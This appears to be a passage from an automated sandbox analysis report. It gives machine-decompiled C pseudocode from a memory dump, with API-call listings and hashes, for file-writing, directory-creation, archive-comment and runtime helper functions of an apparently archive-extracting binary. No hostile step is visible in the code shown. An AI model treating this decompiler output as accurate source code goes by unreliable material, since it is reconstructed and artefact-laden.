                                                                            								if(E00196C55(0x1d00e0, _t53 + 0x1e, 0) == 0) {
                                                                            									E00196E9B(0x1d00e0, _t59, 0, _t56);
                                                                            									goto L21;
                                                                            								}
                                                                            								if(_a8 < _t59 && _a8 > 0) {
                                                                            									_t58 =  *_t53;
                                                                            									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
                                                                            									asm("sbb edx, 0x0");
                                                                            									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
                                                                            								}
                                                                            								continue;
                                                                            							}
                                                                            						} else {
                                                                            							goto L7;
                                                                            						}
                                                                            						while(1) {
                                                                            							L7:
                                                                            							_t32 = _t59 - _t57;
                                                                            							if(_t32 >= 0x4000) {
                                                                            								_t32 = 0x4000;
                                                                            							}
                                                                            							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
                                                                            							asm("sbb bl, bl");
                                                                            							_t42 =  ~_t10 + 1;
                                                                            							if(_t42 == 0) {
                                                                            								goto L14;
                                                                            							}
                                                                            							_t57 = _t57 + 0x4000;
                                                                            							if(_t57 < _t59) {
                                                                            								continue;
                                                                            							}
                                                                            							L13:
                                                                            							if(_t42 != 0) {
                                                                            								goto L21;
                                                                            							}
                                                                            							goto L14;
                                                                            						}
                                                                            						goto L14;
                                                                            						L12:
                                                                            						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
                                                                            						asm("sbb al, al");
                                                                            						_t42 =  ~(_t24 - 1) + 1;
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				return 1;
                                                                            			}














                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,0019C90A,00000001,?,?,?,00000000,001A4AF4,?,?,?,?,?,001A4599), ref: 00199C4F
                                                                            • WriteFile.KERNEL32(?,00000000,?,001A47A1,00000000,?,?,00000000,001A4AF4,?,?,?,?,?,001A4599,?), ref: 00199C8F
                                                                            • WriteFile.KERNELBASE(?,00000000,?,001A47A1,00000000,?,00000001,?,?,0019C90A,00000001,?,?,?,00000000,001A4AF4), ref: 00199CBC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileWrite$Handle
                                                                            • String ID:
                                                                            • API String ID: 4209713984-0
                                                                            • Opcode ID: e221e469a689337d6a90f29c4ba5efdcabf5a08019f92fdd91970af62774a9b9
                                                                            • Instruction ID: 4bb6d155017178c720a0e462734999f497173fa86433144aa78eeaf63314928e
                                                                            • Opcode Fuzzy Hash: e221e469a689337d6a90f29c4ba5efdcabf5a08019f92fdd91970af62774a9b9
                                                                            • Instruction Fuzzy Hash: 7331367164420AAFDF248F28CC48BAABBE8FF51711F00851DF19597690C774E888CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00199EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
                                                                            				short _v4100;
                                                                            				signed int _t8;
                                                                            				long _t10;
                                                                            				void* _t11;
                                                                            				int _t18;
                                                                            				WCHAR* _t21;
                                                                            
                                                                            				E001AD940();
                                                                            				_t21 = _a4;
                                                                            				_t8 =  *(E0019B927(__eflags, _t21)) & 0x0000ffff;
                                                                            				if(_t8 == 0x2e || _t8 == 0x20) {
                                                                            					L3:
                                                                            					if(E00199E6B(_t21) != 0 || E0019B32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
                                                                            						_t10 = GetLastError();
                                                                            						__eflags = _t10 - 2;
                                                                            						if(_t10 == 2) {
                                                                            							L12:
                                                                            							_t11 = 2;
                                                                            						} else {
                                                                            							__eflags = _t10 - 3;
                                                                            							if(_t10 == 3) {
                                                                            								goto L12;
                                                                            							} else {
                                                                            								_t11 = 1;
                                                                            							}
                                                                            						}
                                                                            					} else {
                                                                            						goto L6;
                                                                            					}
                                                                            				} else {
                                                                            					_t18 = CreateDirectoryW(_t21, 0); // executed
                                                                            					if(_t18 != 0) {
                                                                            						L6:
                                                                            						if(_a8 != 0) {
                                                                            							E0019A12F(_t21, _a12); // executed
                                                                            						}
                                                                            						_t11 = 0;
                                                                            					} else {
                                                                            						goto L3;
                                                                            					}
                                                                            				}
                                                                            				return _t11;
                                                                            			}










                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 00199F19
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 00199F4C
                                                                            • GetLastError.KERNEL32(?,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 00199F69
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateDirectory$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 2485089472-0
                                                                            • Opcode ID: b05ab1f4d54b4a2471a6c49065a10626f31f59cedeb5d1a1c60b936e893ab8f2
                                                                            • Instruction ID: 818d66cef9f82f32ec3e2cdf77e552c238d91479333825874df079bee7d3876b
                                                                            • Opcode Fuzzy Hash: b05ab1f4d54b4a2471a6c49065a10626f31f59cedeb5d1a1c60b936e893ab8f2
                                                                            • Instruction Fuzzy Hash: 2801B17150821866DF21ABBD9C49BFEBB4CAF16741F14045AF901E6091D764C9C1C6E6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E0019399D(void* __ecx, signed int __edx) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				char _t76;
                                                                            				signed int _t83;
                                                                            				intOrPtr _t94;
                                                                            				void* _t120;
                                                                            				char _t121;
                                                                            				void* _t123;
                                                                            				void* _t130;
                                                                            				signed int _t144;
                                                                            				signed int _t148;
                                                                            				void* _t151;
                                                                            				void* _t153;
                                                                            
                                                                            				_t143 = __edx;
                                                                            				_t123 = __ecx;
                                                                            				E001AD870(E001C11BE, _t153);
                                                                            				E001AD940();
                                                                            				_t151 = _t123;
                                                                            				_t156 =  *((char*)(_t151 + 0x6cc4));
                                                                            				if( *((char*)(_t151 + 0x6cc4)) == 0) {
                                                                            					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
                                                                            					if(__eflags > 0) {
                                                                            						L26:
                                                                            						E0019134C(__eflags, 0x1e, _t151 + 0x1e);
                                                                            						goto L27;
                                                                            					}
                                                                            					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
                                                                            					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
                                                                            					if(__eflags > 0) {
                                                                            						goto L26;
                                                                            					}
                                                                            					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
                                                                            					__eflags = _t83;
                                                                            					if(_t83 != 0) {
                                                                            						L7:
                                                                            						_t120 = _t151 + 0x20e8;
                                                                            						E0019C5C9(_t83, _t120);
                                                                            						_push(_t120);
                                                                            						E001A14DE(_t153 - 0xe6ec, __eflags);
                                                                            						_t121 = 0;
                                                                            						 *((intOrPtr*)(_t153 - 4)) = 0;
                                                                            						E001A2842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
                                                                            						_t148 =  *(_t153 + 8);
                                                                            						__eflags =  *(_t153 + 0xc);
                                                                            						if( *(_t153 + 0xc) != 0) {
                                                                            							L15:
                                                                            							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
                                                                            							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
                                                                            								L18:
                                                                            								E0019A728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
                                                                            								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
                                                                            								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
                                                                            								 *((char*)(_t151 + 0x2110)) = _t121;
                                                                            								E0019C67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
                                                                            								_t130 = _t151 + 0x20e8;
                                                                            								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
                                                                            								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
                                                                            								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
                                                                            								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
                                                                            								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
                                                                            								_t144 =  *(_t151 + 0x5634);
                                                                            								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
                                                                            								 *(_t153 - 0x9aa0) = _t144;
                                                                            								 *((char*)(_t153 - 0x9a8c)) = _t121;
                                                                            								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
                                                                            								if(__eflags != 0) {
                                                                            									E001A24D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
                                                                            								} else {
                                                                            									_push(_t144);
                                                                            									_push(_t94);
                                                                            									_push(_t130); // executed
                                                                            									E0019910B(_t121, _t144, _t148, __eflags); // executed
                                                                            								}
                                                                            								asm("sbb edx, edx");
                                                                            								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
                                                                            								__eflags = E0019A6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
                                                                            								if(__eflags != 0) {
                                                                            									_t121 = 1;
                                                                            								} else {
                                                                            									E00196BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
                                                                            									E00196E03(0x1d00e0, 3);
                                                                            									__eflags = _t148;
                                                                            									if(_t148 != 0) {
                                                                            										E0019FBBB(_t148);
                                                                            									}
                                                                            								}
                                                                            								L25:
                                                                            								E001A16CB(_t153 - 0xe6ec, _t143, _t148, _t151);
                                                                            								_t76 = _t121;
                                                                            								goto L28;
                                                                            							}
                                                                            							_t143 =  *(_t151 + 0x21bc);
                                                                            							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
                                                                            							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
                                                                            								goto L25;
                                                                            							}
                                                                            							asm("sbb ecx, ecx");
                                                                            							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
                                                                            							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
                                                                            							E0019C634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
                                                                            							goto L18;
                                                                            						}
                                                                            						__eflags =  *(_t151 + 0x5634);
                                                                            						if(__eflags < 0) {
                                                                            							L12:
                                                                            							__eflags = _t148;
                                                                            							if(_t148 != 0) {
                                                                            								E00191EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
                                                                            								E0019C699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
                                                                            							} else {
                                                                            								 *((char*)(_t151 + 0x2111)) = 1;
                                                                            							}
                                                                            							goto L15;
                                                                            						}
                                                                            						if(__eflags > 0) {
                                                                            							L11:
                                                                            							E0019134C(__eflags, 0x1e, _t151 + 0x1e);
                                                                            							goto L25;
                                                                            						}
                                                                            						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
                                                                            						if(__eflags <= 0) {
                                                                            							goto L12;
                                                                            						}
                                                                            						goto L11;
                                                                            					}
                                                                            					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
                                                                            					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
                                                                            						goto L7;
                                                                            					} else {
                                                                            						_t76 = 1;
                                                                            						goto L28;
                                                                            					}
                                                                            				} else {
                                                                            					E0019134C(_t156, 0x1d, _t151 + 0x1e);
                                                                            					E00196E03(0x1d00e0, 3);
                                                                            					L27:
                                                                            					_t76 = 0;
                                                                            					L28:
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
                                                                            					return _t76;
                                                                            				}
                                                                            			}


















                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID: CMT
                                                                            • API String ID: 3519838083-2756464174
                                                                            • Opcode ID: b538680374f109f5a81e5e9565fa20febbcaf93f4f6497773769c4ee70627faa
                                                                            • Instruction ID: f5e6d8913f6a952ab7007082ce521fe3636637b2f0fba10c020c8638a12bf255
                                                                            • Opcode Fuzzy Hash: b538680374f109f5a81e5e9565fa20febbcaf93f4f6497773769c4ee70627faa
                                                                            • Instruction Fuzzy Hash: 0F71CD75500F44AADF25DB30CC41AEBB7E8AB25301F44492EE5AB97242E7326A88CF11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001BA51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				char _v264;
                                                                            				char _v520;
                                                                            				char _v776;
                                                                            				char _v1800;
                                                                            				char _v1814;
                                                                            				struct _cpinfo _v1820;
                                                                            				intOrPtr _v1824;
                                                                            				signed char _v1828;
                                                                            				signed int _t63;
                                                                            				void* _t67;
                                                                            				signed char _t68;
                                                                            				intOrPtr _t69;
                                                                            				void* _t72;
                                                                            				char _t73;
                                                                            				char _t74;
                                                                            				signed char _t75;
                                                                            				signed int _t76;
                                                                            				signed char _t88;
                                                                            				signed int _t91;
                                                                            				signed int _t92;
                                                                            				signed int _t93;
                                                                            				void* _t94;
                                                                            				char* _t95;
                                                                            				intOrPtr _t99;
                                                                            				signed int _t100;
                                                                            
                                                                            				_t93 = __edx;
                                                                            				_t63 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t63 ^ _t100;
                                                                            				_t99 = _a4;
                                                                            				_t4 = _t99 + 4; // 0x5efc4d8b
                                                                            				if(GetCPInfo( *_t4,  &_v1820) == 0) {
                                                                            					_t47 = _t99 + 0x119; // 0x1bab69
                                                                            					_t94 = _t47;
                                                                            					_t88 = 0;
                                                                            					_t67 = 0xffffff9f;
                                                                            					_t68 = _t67 - _t94;
                                                                            					__eflags = _t68;
                                                                            					_v1828 = _t68;
                                                                            					do {
                                                                            						_t95 = _t94 + _t88;
                                                                            						_t69 = _t68 + _t95;
                                                                            						_v1824 = _t69;
                                                                            						__eflags = _t69 + 0x20 - 0x19;
                                                                            						if(_t69 + 0x20 > 0x19) {
                                                                            							__eflags = _v1824 - 0x19;
                                                                            							if(_v1824 > 0x19) {
                                                                            								 *_t95 = 0;
                                                                            							} else {
                                                                            								_t72 = _t99 + _t88;
                                                                            								_t57 = _t72 + 0x19;
                                                                            								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                            								__eflags =  *_t57;
                                                                            								_t59 = _t88 - 0x20; // -32
                                                                            								_t73 = _t59;
                                                                            								goto L24;
                                                                            							}
                                                                            						} else {
                                                                            							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
                                                                            							_t54 = _t88 + 0x20; // 0x20
                                                                            							_t73 = _t54;
                                                                            							L24:
                                                                            							 *_t95 = _t73;
                                                                            						}
                                                                            						_t68 = _v1828;
                                                                            						_t61 = _t99 + 0x119; // 0x1bab69
                                                                            						_t94 = _t61;
                                                                            						_t88 = _t88 + 1;
                                                                            						__eflags = _t88 - 0x100;
                                                                            					} while (_t88 < 0x100);
                                                                            				} else {
                                                                            					_t74 = 0;
                                                                            					do {
                                                                            						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
                                                                            						_t74 = _t74 + 1;
                                                                            					} while (_t74 < 0x100);
                                                                            					_t75 = _v1814;
                                                                            					_t91 =  &_v1814;
                                                                            					_v264 = 0x20;
                                                                            					while(1) {
                                                                            						_t106 = _t75;
                                                                            						if(_t75 == 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t93 =  *(_t91 + 1) & 0x000000ff;
                                                                            						_t76 = _t75 & 0x000000ff;
                                                                            						while(1) {
                                                                            							__eflags = _t76 - _t93;
                                                                            							if(_t76 > _t93) {
                                                                            								break;
                                                                            							}
                                                                            							__eflags = _t76 - 0x100;
                                                                            							if(_t76 < 0x100) {
                                                                            								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
                                                                            								_t76 = _t76 + 1;
                                                                            								__eflags = _t76;
                                                                            								continue;
                                                                            							}
                                                                            							break;
                                                                            						}
                                                                            						_t91 = _t91 + 2;
                                                                            						__eflags = _t91;
                                                                            						_t75 =  *_t91;
                                                                            					}
                                                                            					_t13 = _t99 + 4; // 0x5efc4d8b
                                                                            					E001BB5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
                                                                            					_t16 = _t99 + 4; // 0x5efc4d8b
                                                                            					_t19 = _t99 + 0x21c; // 0x2ebf88b
                                                                            					E001B97C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
                                                                            					_t21 = _t99 + 4; // 0x5efc4d8b
                                                                            					_t23 = _t99 + 0x21c; // 0x2ebf88b
                                                                            					E001B97C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
                                                                            					_t92 = 0;
                                                                            					do {
                                                                            						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
                                                                            						if((_t68 & 0x00000001) == 0) {
                                                                            							__eflags = _t68 & 0x00000002;
                                                                            							if((_t68 & 0x00000002) == 0) {
                                                                            								 *(_t99 + _t92 + 0x119) = 0;
                                                                            							} else {
                                                                            								_t37 = _t99 + _t92 + 0x19;
                                                                            								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
                                                                            								__eflags =  *_t37;
                                                                            								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
                                                                            								goto L15;
                                                                            							}
                                                                            						} else {
                                                                            							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
                                                                            							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
                                                                            							L15:
                                                                            							 *(_t99 + _t92 + 0x119) = _t68;
                                                                            						}
                                                                            						_t92 = _t92 + 1;
                                                                            					} while (_t92 < 0x100);
                                                                            				}
                                                                            				return E001AE203(_t68, _v8 ^ _t100);
                                                                            			}






























                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001BA543
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID:
                                                                            • API String ID: 1807457897-3916222277
                                                                            • Opcode ID: afd2f28d43c806ac0a9f52c439510bc12e438015c95fa10d3d89db264cf587c9
                                                                            • Instruction ID: 4bc80e040af3a9e957b30507d4f367dca8e3611ee53f86dc8327ae861dd11884
                                                                            • Opcode Fuzzy Hash: afd2f28d43c806ac0a9f52c439510bc12e438015c95fa10d3d89db264cf587c9
                                                                            • Instruction Fuzzy Hash: 734117B05042889ADB268E28CC94BFABBF9EF55304F5804EDE59A86142D3359A45CF21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E00191D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
                                                                            				void* _t34;
                                                                            				intOrPtr _t41;
                                                                            				intOrPtr _t51;
                                                                            				void* _t62;
                                                                            				unsigned int _t64;
                                                                            				signed int _t66;
                                                                            				intOrPtr* _t68;
                                                                            				void* _t70;
                                                                            
                                                                            				_t62 = __edx;
                                                                            				_t51 = __ecx;
                                                                            				E001AD870(E001C1173, _t70);
                                                                            				_t49 = 0;
                                                                            				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
                                                                            				 *((intOrPtr*)(_t70 - 0x24)) = 0;
                                                                            				 *(_t70 - 0x20) = 0;
                                                                            				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
                                                                            				 *((intOrPtr*)(_t70 - 0x18)) = 0;
                                                                            				 *((char*)(_t70 - 0x14)) = 0;
                                                                            				 *((intOrPtr*)(_t70 - 4)) = 0;
                                                                            				_t34 = E0019399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
                                                                            				if(_t34 != 0) {
                                                                            					_t64 =  *(_t70 - 0x20);
                                                                            					E001916C0(_t70 - 0x24, _t62, 1);
                                                                            					_t68 =  *((intOrPtr*)(_t70 + 8));
                                                                            					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
                                                                            					_t16 = _t64 + 1; // 0x1
                                                                            					E00191837(_t68, _t16);
                                                                            					_t41 =  *((intOrPtr*)(_t70 - 0x10));
                                                                            					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
                                                                            						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
                                                                            							E001A0FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
                                                                            						} else {
                                                                            							_t66 = _t64 >> 1;
                                                                            							E001A1059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
                                                                            							 *((short*)( *_t68 + _t66 * 2)) = 0;
                                                                            						}
                                                                            					} else {
                                                                            						_push( *((intOrPtr*)(_t68 + 4)));
                                                                            						_push( *_t68);
                                                                            						_push( *((intOrPtr*)(_t70 - 0x24)));
                                                                            						E001A1094();
                                                                            					}
                                                                            					E00191837(_t68, E001B2B33( *_t68));
                                                                            					_t49 = 1;
                                                                            				}
                                                                            				E0019159C(_t70 - 0x24);
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
                                                                            				return _t49;
                                                                            			}












                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 00191D66
                                                                              • Part of subcall function 0019399D: __EH_prolog.LIBCMT ref: 001939A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID: CMT
                                                                            • API String ID: 3519838083-2756464174
                                                                            • Opcode ID: 365954817f904b7b4dad8cb5cc509a8de8c37a9d97b78fba75ccc309d53e7851
                                                                            • Instruction ID: 9b30405aef45da8e2a876d43015289403461ce8d776236ff40a91acb3ae17b8d
                                                                            • Opcode Fuzzy Hash: 365954817f904b7b4dad8cb5cc509a8de8c37a9d97b78fba75ccc309d53e7851
                                                                            • Instruction Fuzzy Hash: 0F214876904109AFCF15EF98C9419EEFBF6EF69300F1004ADE855A7251CB325E95CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 37%
                                                                            			E001B9C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                            				signed int _v8;
                                                                            				signed int _t18;
                                                                            				intOrPtr* _t20;
                                                                            				int _t22;
                                                                            				intOrPtr* _t30;
                                                                            				signed int _t32;
                                                                            
                                                                            				_t25 = __ecx;
                                                                            				_push(__ecx);
                                                                            				_t18 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t18 ^ _t32;
                                                                            				_push(__esi);
                                                                            				_t20 = E001B9990(0x16, "LCMapStringEx", 0x1c6084, "LCMapStringEx"); // executed
                                                                            				_t30 = _t20;
                                                                            				if(_t30 == 0) {
                                                                            					_t22 = LCMapStringW(E001B9CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                                                                            				} else {
                                                                            					 *0x1c2260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                                                                            					_t22 =  *_t30();
                                                                            				}
                                                                            				return E001AE203(_t22, _v8 ^ _t32);
                                                                            			}










                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 001B9CD5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: String
                                                                            • String ID: LCMapStringEx
                                                                            • API String ID: 2568140703-3893581201
                                                                            • Opcode ID: ecdd231ca0756dc52ceee6f722a699c96f606506331055f6f3942daf1ce012b6
                                                                            • Instruction ID: b223c87517f0c79ca8dcf2a213ac1004954eafe45bf955dcbb71594d185c7fd4
                                                                            • Opcode Fuzzy Hash: ecdd231ca0756dc52ceee6f722a699c96f606506331055f6f3942daf1ce012b6
                                                                            • Instruction Fuzzy Hash: 9501C232540209BBCF12AF909D05EEE7FA6EF18760F014518FE1466161CB72C972EB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 37%
                                                                            			E001B9C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                                                                            				signed int _v8;
                                                                            				signed int _t8;
                                                                            				intOrPtr* _t10;
                                                                            				int _t11;
                                                                            				intOrPtr* _t19;
                                                                            				signed int _t21;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t8 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t8 ^ _t21;
                                                                            				_t10 = E001B9990(0x14, "InitializeCriticalSectionEx", 0x1c607c, 0x1c6084); // executed
                                                                            				_t19 = _t10;
                                                                            				if(_t19 == 0) {
                                                                            					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
                                                                            				} else {
                                                                            					 *0x1c2260(_a4, _a8, _a12);
                                                                            					_t11 =  *_t19();
                                                                            				}
                                                                            				return E001AE203(_t11, _v8 ^ _t21);
                                                                            			}










                                                                            APIs
